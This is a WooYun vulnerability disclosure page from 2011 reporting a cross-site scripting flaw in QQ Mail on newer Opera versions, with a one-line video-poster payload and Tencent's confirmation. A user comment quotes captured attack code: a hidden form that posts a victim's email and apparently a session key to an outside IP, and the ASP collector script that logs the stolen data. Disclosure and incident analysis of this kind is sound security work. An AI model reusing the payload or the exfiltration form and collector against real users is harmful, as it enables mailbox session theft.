当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02351

漏洞标题:QQ邮箱跨站

相关厂商:腾讯

漏洞作者: youstar

提交时间:2011-06-30 16:12

修复时间:2011-07-30 18:00

公开时间:2011-07-30 18:00

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-06-30: 细节已通知厂商并且等待厂商处理中
2011-06-30: 厂商已经确认,细节仅向厂商公开
2011-07-10: 细节向核心白帽子及相关领域专家公开
2011-07-20: 细节向普通白帽子公开
2011-07-30: 细节向实习白帽子公开
2011-07-30: 细节向公众公开

简要描述:

QQ邮箱存在跨站,没过滤完整呀,只有Opera高版本受影响。

详细说明:

发送如下代码测试即可。

test
<video poster=javascript:alert(1)//


只有Opera高版本受影响。

漏洞证明:

修复方案:

搞这方面的都懂的,过滤,改下规则。

版权声明:转载请注明来源 youstar@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2011-06-30 17:50

厂商回复:

thx

最新状态:

暂无


漏洞评价:

评论

  1. 2011-07-01 13:56 | 蚊虫 ( 实习白帽子 | Rank:36 漏洞数:12 | 我装逼这么牛可还是没妞喜欢我)

    又有XSS了.....

  2. 2011-07-03 14:32 | 晴天小铸 ( 普通白帽子 | Rank:106 漏洞数:31 | 退出黑客界的纠纷,低调求发展。)

    helen 被人中招了<DIV id=abcb_ext1 title="<form name='my_form_' method='post' action=' http://210.40.132.155/Setting/a.asp' target='my_frame1_' > <input type='hidden' name='my_data_mail' value='305536777@qq.com'><input type='hidden' name='my_data_exte' value=''></form><iframe id='my_frame1_' height=0 name='my_frame1_' frameborder=0 scrolling=no></iframe> " style="DISPLAY: none"></DIV><XMP></XMP><STYLE type=text/css>#02 {layout-grid-line:"</XMP>"}</STYLE><XMP></XMP></DIV>这个是我们分析的 中招代码接收代码<%Function Format_Time(s_Time, n_Flag) Dim y, m, d, h, mi, s Format_Time = "" If IsDate(s_Time) = False Then Exit Function y = cstr(year(s_Time)) m = cstr(month(s_Time)) If len(m) = 1 Then m = "0" & m d = cstr(day(s_Time)) If len(d) = 1 Then d = "0" & d h = cstr(hour(FormatDateTime(s_Time, 4))) If len(h) = 1 Then h = "0" & h mi = cstr(minute(s_Time)) If len(mi) = 1 Then mi = "0" & mi s = cstr(second(s_Time)) If len(s) = 1 Then s = "0" & s Select Case n_Flag Case 0 ' yyyy-mm-dd_hh:mm:ss Format_Time = y & "-" & m & "-" & d & "_" & h & ":" & mi & ":" &s Case 1 ' yyyy-mm-dd hh:mm:ss Format_Time = y & "-" & m & "-" & d & " " & h & ":" & mi & ":" & s End SelectEnd Function%><%filename="tet.txt"set fso = Server.CreateObject("Scripting.FileSystemObject")set fout = fso.OpenTextFile(server.mappath("" & filename & ""), 8, true)ret1 = Request.Form("my_data_mail")ret2 = Request.Form("my_data_exte")userip = Request.ServerVariables("HTTP_X_FORWARDED_FOR")If userip = "" Then userip = Request.ServerVariables("REMOTE_ADDR") //IPEnd Ifstr1 = replace(ret1, "%20", "")str2 = replace(ret2, ";%20", ";")if len(str1) > 7 And len(str2) > 20 Thenfout.write Format_Time(now(), 0) & " " & str1 & "(" & userip & ")*" & str2 & chr(13) & chr(10)End Ifset fout=nothingset fso=nothing%>my_data_exte my_data_mail应该是 以前类似QQ空间 key的运用那些人进了helen邮箱想社helen支付宝但是helen有U盾 嘎嘎!

  3. 2011-07-13 10:59 | 蚊虫 ( 实习白帽子 | Rank:36 漏洞数:12 | 我装逼这么牛可还是没妞喜欢我)

    上面 晴天小铸 你是helen代言人? 整天把他挂在嘴边 真有基情嗯呵

  4. 2012-06-05 22:21 | 数据流 ( 普通白帽子 | Rank:716 漏洞数:88 | all or nothing,now or never)

    @蚊虫 蚊虫木JJ